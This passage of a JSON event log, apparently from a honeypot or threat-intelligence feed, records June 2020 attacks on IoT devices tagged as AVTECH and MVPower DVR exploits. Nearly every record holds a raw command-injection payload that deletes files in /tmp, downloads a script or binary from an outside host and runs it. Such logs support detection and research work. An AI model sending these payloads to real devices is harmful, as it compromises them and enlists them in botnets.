748.       "source_ip_address": "159.203.191.246",
749.       "country": "US",
750.       "user_agent": "Snickers-Avtech",
751.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 98.8UsA.sh; chmod 777 98.8UsA.sh; sh 98.8UsA.sh ; echo snickers_was_here HTTP/1.1",
752.       "post_data": "",
753.       "target_port": 8291,
754.       "protocol": "tcp",
755.       "tags": [
756.         {
757.           "cve": "",
758.           "category": "IoT",
759.           "description": "AVTECH Exploit"
760.         }
761.       ],
762.       "event_count": 1,
763.       "first_seen": "2020-06-05T00:31:13Z",
764.       "last_seen": "2020-06-05T00:31:13Z"
765.     },
766.     {
767.       "event_id": "5ec0fe3e7e0c7c25cec989a4cbec3b67e8cf352442073abd0a117df1010b89fe",
768.       "source_ip_address": "159.203.191.246",
769.       "country": "US",
770.       "user_agent": "Snickers-Avtech",
771.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 98.8UsA.sh; chmod 777 98.8UsA.sh; sh 98.8UsA.sh )&password=admin HTTP/1.1",
772.       "post_data": "",
773.       "target_port": 8291,
774.       "protocol": "tcp",
775.       "tags": [
776.         {
777.           "cve": "",
778.           "category": "IoT",
779.           "description": "AVTECH Exploit"
780.         }
781.       ],
782.       "event_count": 1,
783.       "first_seen": "2020-06-05T00:31:11Z",
784.       "last_seen": "2020-06-05T00:31:11Z"
785.     },
786.     {
787.       "event_id": "2c498b68f7672837d42aa8c552855b5028f089ebcdd5f1505e8334663cd7c29f",
788.       "source_ip_address": "159.203.191.246",
789.       "country": "US",
790.       "user_agent": "Snickers-Avtech",
791.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 98.8UsA.sh; chmod 777 98.8UsA.sh; sh 98.8UsA.sh ; echo snickers_was_here HTTP/1.1",
792.       "post_data": "",
793.       "target_port": 8888,
794.       "protocol": "tcp",
795.       "tags": [
796.         {
797.           "cve": "",
798.           "category": "IoT",
799.           "description": "AVTECH Exploit"
800.         }
801.       ],
802.       "event_count": 1,
803.       "first_seen": "2020-06-05T00:31:07Z",
804.       "last_seen": "2020-06-05T00:31:07Z"
805.     },
806.     {
807.       "event_id": "13da8f5c414488bd6a18dd942cf826246ebf18bb3c6bf295beb559a60bb39cf7",
808.       "source_ip_address": "159.203.191.246",
809.       "country": "US",
810.       "user_agent": "Snickers-Avtech",
811.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 98.8UsA.sh; chmod 777 98.8UsA.sh; sh 98.8UsA.sh )&password=admin HTTP/1.1",
812.       "post_data": "",
813.       "target_port": 8888,
814.       "protocol": "tcp",
815.       "tags": [
816.         {
817.           "cve": "",
818.           "category": "IoT",
819.           "description": "AVTECH Exploit"
820.         }
821.       ],
822.       "event_count": 1,
823.       "first_seen": "2020-06-05T00:31:06Z",
824.       "last_seen": "2020-06-05T00:31:06Z"
825.     },
826.     {
827.       "event_id": "86e1e3c1a1ef6311aaceb0d64f14f9f05c1c96818fd63cfb713e0b7f8b633511",
828.       "source_ip_address": "170.81.252.206",
829.       "country": "CO",
830.       "user_agent": "Hello, world",
831.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
832.       "post_data": "",
833.       "target_port": 80,
834.       "protocol": "tcp",
835.       "tags": [
836.         {
837.           "cve": "",
838.           "category": "IoT",
839.           "description": "MVPower DVR (JAWS Web Server) RCE"
840.         }
841.       ],
842.       "event_count": 1,
843.       "first_seen": "2020-06-04T21:59:49Z",
844.       "last_seen": "2020-06-04T21:59:49Z"
845.     },
846.     {
847.       "event_id": "93cba6bb49a0a13ca44ef917e4de34bf1c481ea251f8961b37f18ac79ff69604",
848.       "source_ip_address": "159.203.191.246",
849.       "country": "US",
850.       "user_agent": "Snickers-Avtech",
851.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 37.8UsA.sh; chmod 777 37.8UsA.sh; sh 37.8UsA.sh ; echo snickers_was_here HTTP/1.1",
852.       "post_data": "",
853.       "target_port": 5900,
854.       "protocol": "tcp",
855.       "tags": [
856.         {
857.           "cve": "",
858.           "category": "IoT",
859.           "description": "AVTECH Exploit"
860.         }
861.       ],
862.       "event_count": 1,
863.       "first_seen": "2020-06-04T18:25:52Z",
864.       "last_seen": "2020-06-04T18:25:52Z"
865.     },
866.     {
867.       "event_id": "3517649065a6bce7e34b6ae076f2c422ea7619a8a52a5b1cc9bbc667e287bb01",
868.       "source_ip_address": "159.203.191.246",
869.       "country": "US",
870.       "user_agent": "Snickers-Avtech",
871.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 37.8UsA.sh; chmod 777 37.8UsA.sh; sh 37.8UsA.sh )&password=admin HTTP/1.1",
872.       "post_data": "",
873.       "target_port": 5900,
874.       "protocol": "tcp",
875.       "tags": [
876.         {
877.           "cve": "",
878.           "category": "IoT",
879.           "description": "AVTECH Exploit"
880.         }
881.       ],
882.       "event_count": 1,
883.       "first_seen": "2020-06-04T18:25:50Z",
884.       "last_seen": "2020-06-04T18:25:50Z"
885.     },
886.     {
887.       "event_id": "3b3ca5df830c6fe552a25d1a9443f440d714acf9a33bad46e52bc361667b97ce",
888.       "source_ip_address": "159.203.191.246",
889.       "country": "US",
890.       "user_agent": "Snickers-Avtech",
891.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 37.8UsA.sh; chmod 777 37.8UsA.sh; sh 37.8UsA.sh )&password=admin HTTP/1.1",
892.       "post_data": "",
893.       "target_port": 10243,
894.       "protocol": "tcp",
895.       "tags": [
896.         {
897.           "cve": "",
898.           "category": "IoT",
899.           "description": "AVTECH Exploit"
900.         }
901.       ],
902.       "event_count": 1,
903.       "first_seen": "2020-06-04T18:25:50Z",
904.       "last_seen": "2020-06-04T18:25:50Z"
905.     },
906.     {
907.       "event_id": "4d6245210abce7e3fead8b08428492c99f69d9847e348320c2e5507b9a464ade",
908.       "source_ip_address": "159.203.191.246",
909.       "country": "US",
910.       "user_agent": "Snickers-Avtech",
911.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 37.8UsA.sh; chmod 777 37.8UsA.sh; sh 37.8UsA.sh )&password=admin HTTP/1.1",
912.       "post_data": "",
913.       "target_port": 2083,
914.       "protocol": "tcp",
915.       "tags": [
916.         {
917.           "cve": "",
918.           "category": "IoT",
919.           "description": "AVTECH Exploit"
920.         }
921.       ],
922.       "event_count": 1,
923.       "first_seen": "2020-06-04T18:25:20Z",
924.       "last_seen": "2020-06-04T18:25:20Z"
925.     },
926.     {
927.       "event_id": "af2ec8f7d4b04c9561e5f2f24714997ae461039a8b0aa97afdea74728cc42000",
928.       "source_ip_address": "159.203.191.246",
929.       "country": "US",
930.       "user_agent": "Snickers-Avtech",
931.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 37.8UsA.sh; chmod 777 37.8UsA.sh; sh 37.8UsA.sh ; echo snickers_was_here HTTP/1.1",
932.       "post_data": "",
933.       "target_port": 37777,
934.       "protocol": "tcp",
935.       "tags": [
936.         {
937.           "cve": "",
938.           "category": "IoT",
939.           "description": "AVTECH Exploit"
940.         }
941.       ],
942.       "event_count": 2,
943.       "first_seen": "2020-06-04T18:23:42Z",
944.       "last_seen": "2020-06-04T18:23:42Z"
945.     },
946.     {
947.       "event_id": "dcd978c7825e00c9dcc3e00af2fb2dc5e73f30025d26453d55d61c801786c96d",
948.       "source_ip_address": "159.203.191.246",
949.       "country": "US",
950.       "user_agent": "Snickers-Avtech",
951.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 37.8UsA.sh; chmod 777 37.8UsA.sh; sh 37.8UsA.sh )&password=admin HTTP/1.1",
952.       "post_data": "",
953.       "target_port": 37777,
954.       "protocol": "tcp",
955.       "tags": [
956.         {
957.           "cve": "",
958.           "category": "IoT",
959.           "description": "AVTECH Exploit"
960.         }
961.       ],
962.       "event_count": 2,
963.       "first_seen": "2020-06-04T18:23:39Z",
964.       "last_seen": "2020-06-04T18:23:40Z"
965.     },
966.     {
967.       "event_id": "89c96c76e613f50d2ee4c9c03d16fefd86716b16aa42574b8d28da5eb8b6b3a5",
968.       "source_ip_address": "159.203.191.246",
969.       "country": "US",
970.       "user_agent": "Snickers-Avtech",
971.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 37.8UsA.sh; chmod 777 37.8UsA.sh; sh 37.8UsA.sh )&password=admin HTTP/1.1",
972.       "post_data": "",
973.       "target_port": 9200,
974.       "protocol": "tcp",
975.       "tags": [
976.         {
977.           "cve": "",
978.           "category": "IoT",
979.           "description": "AVTECH Exploit"
980.         }
981.       ],
982.       "event_count": 1,
983.       "first_seen": "2020-06-04T18:23:35Z",
984.       "last_seen": "2020-06-04T18:23:35Z"
985.     },
986.     {
987.       "event_id": "f5eef8cd378f0a4a5b6cae60c17ac3943c24e94c3931a2255fed27da314a88ca",
988.       "source_ip_address": "159.203.191.246",
989.       "country": "US",
990.       "user_agent": "Snickers-Avtech",
991.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 37.8UsA.sh; chmod 777 37.8UsA.sh; sh 37.8UsA.sh )&password=admin HTTP/1.1",
992.       "post_data": "",
993.       "target_port": 8000,
994.       "protocol": "tcp",
995.       "tags": [
996.         {
997.           "cve": "",
998.           "category": "IoT",
999.           "description": "AVTECH Exploit"
1000.         }
1001.       ],
1002.       "event_count": 1,
1003.       "first_seen": "2020-06-04T18:21:32Z",
1004.       "last_seen": "2020-06-04T18:21:32Z"
1005.     },
1006.     {
1007.       "event_id": "543307266a3128a477476417a2954ddd35b98242b4b1c8419baa68324ba07a76",
1008.       "source_ip_address": "159.203.191.246",
1009.       "country": "US",
1010.       "user_agent": "Snickers-Avtech",
1011.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 37.8UsA.sh; chmod 777 37.8UsA.sh; sh 37.8UsA.sh )&password=admin HTTP/1.1",
1012.       "post_data": "",
1013.       "target_port": 8139,
1014.       "protocol": "tcp",
1015.       "tags": [
1016.         {
1017.           "cve": "",
1018.           "category": "IoT",
1019.           "description": "AVTECH Exploit"
1020.         }
1021.       ],
1022.       "event_count": 1,
1023.       "first_seen": "2020-06-04T18:21:31Z",
1024.       "last_seen": "2020-06-04T18:21:31Z"
1025.     },
1026.     {
1027.       "event_id": "4f48ba60b134045b75d8883d4e0ca73582875398590e82d900d6733cab126d55",
1028.       "source_ip_address": "159.203.191.246",
1029.       "country": "US",
1030.       "user_agent": "Snickers-Avtech",
1031.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 37.8UsA.sh; chmod 777 37.8UsA.sh; sh 37.8UsA.sh ; echo snickers_was_here HTTP/1.1",
1032.       "post_data": "",
1033.       "target_port": 9000,
1034.       "protocol": "tcp",
1035.       "tags": [
1036.         {
1037.           "cve": "",
1038.           "category": "IoT",
1039.           "description": "AVTECH Exploit"
1040.         }
1041.       ],
1042.       "event_count": 1,
1043.       "first_seen": "2020-06-04T18:21:30Z",
1044.       "last_seen": "2020-06-04T18:21:30Z"
1045.     },
1046.     {
1047.       "event_id": "43c77027f3a4d60329e8fbdfe706c81539a6d8ab9a91e450aba833d5491069bc",
1048.       "source_ip_address": "159.203.191.246",
1049.       "country": "US",
1050.       "user_agent": "Snickers-Avtech",
1051.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 37.8UsA.sh; chmod 777 37.8UsA.sh; sh 37.8UsA.sh )&password=admin HTTP/1.1",
1052.       "post_data": "",
1053.       "target_port": 9000,
1054.       "protocol": "tcp",
1055.       "tags": [
1056.         {
1057.           "cve": "",
1058.           "category": "IoT",
1059.           "description": "AVTECH Exploit"
1060.         }
1061.       ],
1062.       "event_count": 1,
1063.       "first_seen": "2020-06-04T18:21:28Z",
1064.       "last_seen": "2020-06-04T18:21:28Z"
1065.     },
1066.     {
1067.       "event_id": "e8f87fda94282addd286eea0e25b86a5d4c13efd41053c44464c726ee5861f25",
1068.       "source_ip_address": "159.203.191.246",
1069.       "country": "US",
1070.       "user_agent": "Snickers-Avtech",
1071.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 37.8UsA.sh; chmod 777 37.8UsA.sh; sh 37.8UsA.sh ; echo snickers_was_here HTTP/1.1",
1072.       "post_data": "",
1073.       "target_port": 7001,
1074.       "protocol": "tcp",
1075.       "tags": [
1076.         {
1077.           "cve": "",
1078.           "category": "IoT",
1079.           "description": "AVTECH Exploit"
1080.         }
1081.       ],
1082.       "event_count": 1,
1083.       "first_seen": "2020-06-04T18:21:28Z",
1084.       "last_seen": "2020-06-04T18:21:28Z"
1085.     },
1086.     {
1087.       "event_id": "7ee7426e81e8b85e5906e7a0be30170665e557309a9689c92790e90c49e53566",
1088.       "source_ip_address": "159.203.191.246",
1089.       "country": "US",
1090.       "user_agent": "Snickers-Avtech",
1091.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 37.8UsA.sh; chmod 777 37.8UsA.sh; sh 37.8UsA.sh ; echo snickers_was_here HTTP/1.1",
1092.       "post_data": "",
1093.       "target_port": 7547,
1094.       "protocol": "tcp",
1095.       "tags": [
1096.         {
1097.           "cve": "",
1098.           "category": "IoT",
1099.           "description": "AVTECH Exploit"
1100.         }
1101.       ],
1102.       "event_count": 1,
1103.       "first_seen": "2020-06-04T18:21:27Z",
1104.       "last_seen": "2020-06-04T18:21:27Z"
1105.     },
1106.     {
1107.       "event_id": "728967da2b1eb60e5e88a44b62667d2658edb3cd78c644646feb85dab3a0a5d0",
1108.       "source_ip_address": "159.203.191.246",
1109.       "country": "US",
1110.       "user_agent": "Snickers-Avtech",
1111.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 37.8UsA.sh; chmod 777 37.8UsA.sh; sh 37.8UsA.sh )&password=admin HTTP/1.1",
1112.       "post_data": "",
1113.       "target_port": 7547,
1114.       "protocol": "tcp",
1115.       "tags": [
1116.         {
1117.           "cve": "",
1118.           "category": "IoT",
1119.           "description": "AVTECH Exploit"
1120.         }
1121.       ],
1122.       "event_count": 1,
1123.       "first_seen": "2020-06-04T18:21:25Z",
1124.       "last_seen": "2020-06-04T18:21:25Z"
1125.     },
1126.     {
1127.       "event_id": "6f119d20bb14b5fd6b6a91201de67c55c5da2ef0c75eb16cce98eb51f77ad1f5",
1128.       "source_ip_address": "159.203.191.246",
1129.       "country": "US",
1130.       "user_agent": "Snickers-Avtech",
1131.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 37.8UsA.sh; chmod 777 37.8UsA.sh; sh 37.8UsA.sh )&password=admin HTTP/1.1",
1132.       "post_data": "",
1133.       "target_port": 7001,
1134.       "protocol": "tcp",
1135.       "tags": [
1136.         {
1137.           "cve": "",
1138.           "category": "IoT",
1139.           "description": "AVTECH Exploit"
1140.         }
1141.       ],
1142.       "event_count": 1,
1143.       "first_seen": "2020-06-04T18:21:25Z",
1144.       "last_seen": "2020-06-04T18:21:25Z"
1145.     },
1146.     {
1147.       "event_id": "02e2885a28ad75601c5d92aa374cde453b4311171ebf54a12a755c6420c4afad",
1148.       "source_ip_address": "159.203.191.246",
1149.       "country": "US",
1150.       "user_agent": "Snickers-Avtech",
1151.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 37.8UsA.sh; chmod 777 37.8UsA.sh; sh 37.8UsA.sh ; echo snickers_was_here HTTP/1.1",
1152.       "post_data": "",
1153.       "target_port": 8291,
1154.       "protocol": "tcp",
1155.       "tags": [
1156.         {
1157.           "cve": "",
1158.           "category": "IoT",
1159.           "description": "AVTECH Exploit"
1160.         }
1161.       ],
1162.       "event_count": 1,
1163.       "first_seen": "2020-06-04T18:20:54Z",
1164.       "last_seen": "2020-06-04T18:20:54Z"
1165.     },
1166.     {
1167.       "event_id": "6e2b652e62726a17ddc5e76fd347e2fb1537f7c8ca7bdb13382da66b0e5aa6f0",
1168.       "source_ip_address": "159.203.191.246",
1169.       "country": "US",
1170.       "user_agent": "Snickers-Avtech",
1171.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 37.8UsA.sh; chmod 777 37.8UsA.sh; sh 37.8UsA.sh )&password=admin HTTP/1.1",
1172.       "post_data": "",
1173.       "target_port": 8291,
1174.       "protocol": "tcp",
1175.       "tags": [
1176.         {
1177.           "cve": "",
1178.           "category": "IoT",
1179.           "description": "AVTECH Exploit"
1180.         }
1181.       ],
1182.       "event_count": 1,
1183.       "first_seen": "2020-06-04T18:20:52Z",
1184.       "last_seen": "2020-06-04T18:20:52Z"
1185.     },
1186.     {
1187.       "event_id": "20f4fa439b9325cebb9fa722b644003121ef26075d70162be3f7f73e6f3cdae3",
1188.       "source_ip_address": "159.203.191.246",
1189.       "country": "US",
1190.       "user_agent": "Snickers-Avtech",
1191.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 37.8UsA.sh; chmod 777 37.8UsA.sh; sh 37.8UsA.sh ; echo snickers_was_here HTTP/1.1",
1192.       "post_data": "",
1193.       "target_port": 8888,
1194.       "protocol": "tcp",
1195.       "tags": [
1196.         {
1197.           "cve": "",
1198.           "category": "IoT",
1199.           "description": "AVTECH Exploit"
1200.         }
1201.       ],
1202.       "event_count": 1,
1203.       "first_seen": "2020-06-04T18:20:49Z",
1204.       "last_seen": "2020-06-04T18:20:49Z"
1205.     },
1206.     {
1207.       "event_id": "458b4aa0ec58a05b761a86ba269f1bf48010d7c0cbf341414509c85af3b27a2c",
1208.       "source_ip_address": "159.203.191.246",
1209.       "country": "US",
1210.       "user_agent": "Snickers-Avtech",
1211.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 37.8UsA.sh; chmod 777 37.8UsA.sh; sh 37.8UsA.sh )&password=admin HTTP/1.1",
1212.       "post_data": "",
1213.       "target_port": 8888,
1214.       "protocol": "tcp",
1215.       "tags": [
1216.         {
1217.           "cve": "",
1218.           "category": "IoT",
1219.           "description": "AVTECH Exploit"
1220.         }
1221.       ],
1222.       "event_count": 1,
1223.       "first_seen": "2020-06-04T18:20:47Z",
1224.       "last_seen": "2020-06-04T18:20:47Z"
1225.     },
1226.     {
1227.       "event_id": "aeefc616c5b7795d5fa6acbbb1136ffd669818f51cb5f45a046aebd9aa64c8b4",
1228.       "source_ip_address": "82.255.38.238",
1229.       "country": "FR",
1230.       "user_agent": "Hello, world",
1231.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
1232.       "post_data": "",
1233.       "target_port": 80,
1234.       "protocol": "tcp",
1235.       "tags": [
1236.         {
1237.           "cve": "",
1238.           "category": "IoT",
1239.           "description": "MVPower DVR (JAWS Web Server) RCE"
1240.         }
1241.       ],
1242.       "event_count": 1,
1243.       "first_seen": "2020-06-04T17:07:42Z",
1244.       "last_seen": "2020-06-04T17:07:42Z"
1245.     },
1246.     {
1247.       "event_id": "52e91f4a9e825feb284787eef41e3195452f343a8e6de9c777887836136f04b0",
1248.       "source_ip_address": "70.45.130.159",
1249.       "country": "PR",
1250.       "user_agent": "Hello, world",
1251.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
1252.       "post_data": "",
1253.       "target_port": 80,
1254.       "protocol": "tcp",
1255.       "tags": [
1256.         {
1257.           "cve": "",
1258.           "category": "IoT",
1259.           "description": "MVPower DVR (JAWS Web Server) RCE"
1260.         }
1261.       ],
1262.       "event_count": 3,
1263.       "first_seen": "2020-06-04T03:01:51Z",
1264.       "last_seen": "2020-06-04T03:01:56Z"
1265.     },
1266.     {
1267.       "event_id": "0afde771b622de4a81946aa70564340db871f83887d4704ad632b46de0b56af3",
1268.       "source_ip_address": "118.69.109.149",
1269.       "country": "VN",
1270.       "user_agent": "Hello, world",
1271.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
1272.       "post_data": "",
1273.       "target_port": 80,
1274.       "protocol": "tcp",
1275.       "tags": [
1276.         {
1277.           "cve": "",
1278.           "category": "IoT",
1279.           "description": "MVPower DVR (JAWS Web Server) RCE"
1280.         }
1281.       ],
1282.       "event_count": 1,
1283.       "first_seen": "2020-06-03T19:50:36Z",
1284.       "last_seen": "2020-06-03T19:50:36Z"
1285.     },
1286.     {
1287.       "event_id": "ef5cff075d809f2474e702d1b31d242084fb2db665c1fe59b9df2e811cc0778d",
1288.       "source_ip_address": "186.182.83.148",
1289.       "country": "AR",
1290.       "user_agent": "Hello, world",
1291.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
1292.       "post_data": "",
1293.       "target_port": 80,
1294.       "protocol": "tcp",
1295.       "tags": [
1296.         {
1297.           "cve": "",
1298.           "category": "IoT",
1299.           "description": "MVPower DVR (JAWS Web Server) RCE"
1300.         }
1301.       ],
1302.       "event_count": 1,
1303.       "first_seen": "2020-06-03T14:00:43Z",
1304.       "last_seen": "2020-06-03T14:00:43Z"
1305.     },
1306.     {
1307.       "event_id": "1c3caccec600ec55e95fa523460f2c0ec1379042b16bd91ca24aedc06ad50af5",
1308.       "source_ip_address": "181.120.188.61",
1309.       "country": "PY",
1310.       "user_agent": "Hello, world",
1311.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
1312.       "post_data": "",
1313.       "target_port": 80,
1314.       "protocol": "tcp",
1315.       "tags": [
1316.         {
1317.           "cve": "",
1318.           "category": "IoT",
1319.           "description": "MVPower DVR (JAWS Web Server) RCE"
1320.         }
1321.       ],
1322.       "event_count": 1,
1323.       "first_seen": "2020-06-03T13:54:09Z",
1324.       "last_seen": "2020-06-03T13:54:09Z"
1325.     },
1326.     {
1327.       "event_id": "70913fd2ff6566c27c6174634eae273a4484a1661b1323d9d37c3e9bd9f3cc5f",
1328.       "source_ip_address": "24.55.185.28",
1329.       "country": "PR",
1330.       "user_agent": "Hello, world",
1331.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
1332.       "post_data": "",
1333.       "target_port": 80,
1334.       "protocol": "tcp",
1335.       "tags": [
1336.         {
1337.           "cve": "",
1338.           "category": "IoT",
1339.           "description": "MVPower DVR (JAWS Web Server) RCE"
1340.         }
1341.       ],
1342.       "event_count": 1,
1343.       "first_seen": "2020-06-03T09:41:26Z",
1344.       "last_seen": "2020-06-03T09:41:26Z"
1345.     },
1346.     {
1347.       "event_id": "97d16848ee5bbe427eb9fa7b7619ad15a2999f5d0c81d67de0472af2899db31e",
1348.       "source_ip_address": "79.11.150.217",
1349.       "country": "IT",
1350.       "user_agent": "Hello, world",
1351.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
1352.       "post_data": "",
1353.       "target_port": 80,
1354.       "protocol": "tcp",
1355.       "tags": [
1356.         {
1357.           "cve": "",
1358.           "category": "IoT",
1359.           "description": "MVPower DVR (JAWS Web Server) RCE"
1360.         }
1361.       ],
1362.       "event_count": 1,
1363.       "first_seen": "2020-06-03T08:38:35Z",
1364.       "last_seen": "2020-06-03T08:38:35Z"
1365.     },
1366.     {
1367.       "event_id": "358ee8b9db1d454fdeadafff67f26f779eea5a08b452d12dd95b124697103b0b",
1368.       "source_ip_address": "103.59.214.238",
1369.       "country": "IN",
1370.       "user_agent": "Hello, world",
1371.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
1372.       "post_data": "",
1373.       "target_port": 80,
1374.       "protocol": "tcp",
1375.       "tags": [
1376.         {
1377.           "cve": "",
1378.           "category": "IoT",
1379.           "description": "MVPower DVR (JAWS Web Server) RCE"
1380.         }
1381.       ],
1382.       "event_count": 1,
1383.       "first_seen": "2020-06-03T08:35:16Z",
1384.       "last_seen": "2020-06-03T08:35:16Z"
1385.     },
1386.     {
1387.       "event_id": "4e5d11659b234c23b5874ce5bf09cf286140777572879e7d2c28914682c00bfb",
1388.       "source_ip_address": "200.188.153.18",
1389.       "country": "MX",
1390.       "user_agent": "Hello, world",
1391.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
1392.       "post_data": "",
1393.       "target_port": 80,
1394.       "protocol": "tcp",
1395.       "tags": [
1396.         {
1397.           "cve": "",
1398.           "category": "IoT",
1399.           "description": "MVPower DVR (JAWS Web Server) RCE"
1400.         }
1401.       ],
1402.       "event_count": 2,
1403.       "first_seen": "2020-06-03T06:12:18Z",
1404.       "last_seen": "2020-06-03T08:01:18Z"
1405.     },
1406.     {
1407.       "event_id": "fb4b5d2fdd3818cfad2381b821034e6b87e9dfd0958d3b9bd750c07a3afc47fc",
1408.       "source_ip_address": "120.29.125.227",
1409.       "country": "PH",
1410.       "user_agent": "Hello, world",
1411.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
1412.       "post_data": "",
1413.       "target_port": 80,
1414.       "protocol": "tcp",
1415.       "tags": [
1416.         {
1417.           "cve": "",
1418.           "category": "IoT",
1419.           "description": "MVPower DVR (JAWS Web Server) RCE"
1420.         }
1421.       ],
1422.       "event_count": 1,
1423.       "first_seen": "2020-06-03T07:36:53Z",
1424.       "last_seen": "2020-06-03T07:36:53Z"
1425.     },
1426.     {
1427.       "event_id": "a03406ccc9c75dbe34d20072825b99d88397bb350089c9f4b08b3161d60e5430",
1428.       "source_ip_address": "203.76.98.139",
1429.       "country": "BD",
1430.       "user_agent": "Hello, world",
1431.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
1432.       "post_data": "",
1433.       "target_port": 80,
1434.       "protocol": "tcp",
1435.       "tags": [
1436.         {
1437.           "cve": "",
